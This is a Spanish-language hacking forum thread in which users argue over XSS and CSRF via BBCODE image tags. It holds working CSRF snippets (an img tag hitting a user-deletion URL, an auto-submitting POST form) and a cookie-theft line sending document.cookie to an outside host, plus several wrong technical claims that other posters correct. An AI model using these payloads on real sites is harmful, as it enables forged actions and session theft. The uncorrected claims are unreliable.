Duda sobre xss

[braulio--]

asi de facil se ejecuta ‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬javascript, osea el ‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬javascript y no en la pagina que quiero atakar.

Me parece que te equivocas, está bien, el javascript no se ejecuta, el php si.
Ahora, bbcode no es un lenguaje que el navegador interprete, el bbcode se transforma a html cuando se manda al foro.
= <img src=urldefoto> (pero con mas atributos)
La petición siempre es get si lo haces desde un src o similar.

[Castg!]

estas ejecutando el codigo javascript "document.topic.submit()" eso es javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

[braulio--]

asi de facil se ejecuta ‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬javascript, osea el ‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬javascript y no en la pagina que quiero atakar.

Y es verdad, no me fijé, el javascript no se ejecuta en el server.

[~ Yoya ~]

asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.

Y es verdad, no me fijé, el ‭‬‭‬javascript no se ejecuta en el server.

Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬javascript "document.topic.submit()" eso es ‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.

[Castg!]

ahora si te entendi perfectamente, no entendia... ya esta, listo gracias

[IWKY]

Bueno aqui doy algunos metodos de atake CSRF mediante peticion GET y POST.

Bueno, tener claro que algunas veces los formularios envían datos por POST pero pasan la variable por $_REQUEST, osea que aunque el formulario la envié por post puedes enviar una petición GET y te la aceptara.

Ok, ahora si tenemos CSRF por metodo GET podemos hacer lo siguiente.
Si se puede usar BBCODE utilisaremos tags que se ejecutan al visualisarlo como puede ser los tag de
img, y entre los tags de imagenes insertamos el CSRF y al visualisar la img estara haciendo la peticion GET.

Código [Seleccionar] Expandir

[IMG]http://serve.com/usuario/eliminar.php
[/IMG]

Por metodo post.
Primero crearemos un formulario que tenga los valores puesto y todo y lo enviaremos con ‭‬javascript.

Código [Seleccionar] Expandir

<html><body>
<form name="topic" method="post" action="http://serve.com/crear_post.php">
<textarea name='topic' rows='5' cols='50' value='lalallalala'></textarea>
</form>
<script>document.topic.submit()</script>
</body></html>


Luego lo subimos a un host. Ahora lo que haremos es llamar nuestro scrit y crear el post.
Con esto lo llamaria:

Código [Seleccionar] Expandir

<IMG SRC="http://host.com/formulario_que_enviara_el_CSRF.html">
Y al tratar de visualisar la img estaria ejecutando el formulario xD.

Saludos.

No digo que no se útil la información, que lo es y mucho, pero yo me quería centrar el problema en XSS, no en CSRF. no se porque el tema ha pasado a CSRF y no se ha hablado de XSS, a no ser que  se exploten de igual manera, cosa que desconozco y que me gustaría aprender, pero creo que mi duda no se ha resuelto, o por lo menos yo no la tengo resuelta, y si es que se ha dado la solución, pido disculpas por que no la veo o entiendo los posts.

Un saludo.

[~ Yoya ~]

XSS es parecido aa CSRF/XSRF, tambien con XSS permanente puedes aplicar CSRF o XSS Tuneling...

Lo que pasa esque XSS no es solo robar cookies, puedes hacer atakes mas elaborado dependiendo de tu conocimiento sobre javascript y luego que quieres hacer... Porque estas aplicando puro javascript xD.

[braulio--]

asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.

Y es verdad, no me fijé, el ‭‬‭‬‭‬javascript no se ejecuta en el server.

Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬‭‬javascript "document.topic.submit()" eso es ‭‬‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo ‭‬javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.

Eso si lo llamas en plan [nobbcode][nobbcode] :
No funciona
Porque el javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código javascript. El document.form.submit() lo hace el navegador no el server.

[~ Yoya ~]

asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.

Y es verdad, no me fijé, el ‭‬‭‬‭‬‭‬javascript no se ejecuta en el server.

Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬‭‬‭‬javascript "document.topic.submit()" eso es ‭‬‭‬‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo ‭‬‭‬javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.

Eso si lo llamas en plan [nobbcode][nobbcode] :
No funciona
Porque el ‭‬javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código ‭‬javascript. El document.form.submit() lo hace el navegador no el server.

Um.. claro porque el unico que interpreta el codigo javascript es el navegador, Osea, Por medio de la peticion GET con tags de img Si funciona, por medio de POST puse varias opciones como img, inframe, etc...
Por algo deje un link sobre un tema similar de ejecutar XSRF mediante POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

[braulio--]

Yo hablo de estas cosas que dijiste :

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

1. El  navegador no interpreta BBCODE, el  que "interpreta" (lo que hace en realidad es transformar a html) el BBCODE es el software SMF (o el que sea), por lo tanto, cuando escribes en bbcode las tags img se transforman en el html resultante <img src=url>... .
2. La peticiones a imágenes y a iframe son siempre por GET (quizás no siempre, no lo sé , pero en este caso sí)

Y lo otro que dijiste :

Y otra cosa, Yo no estoy ejecutando ‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬javascript, osea el ‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬javascript y no en la pagina que quiero atakar.

El javascript, no se ejecuta en el host que tienes el archivo, porque eso es el server, y además , la petición la haces haciendo creer al browser que lo que pide es una imagen, por lo tanto no busca código javascript dentro de ella y no puedes hacer nada con javascript.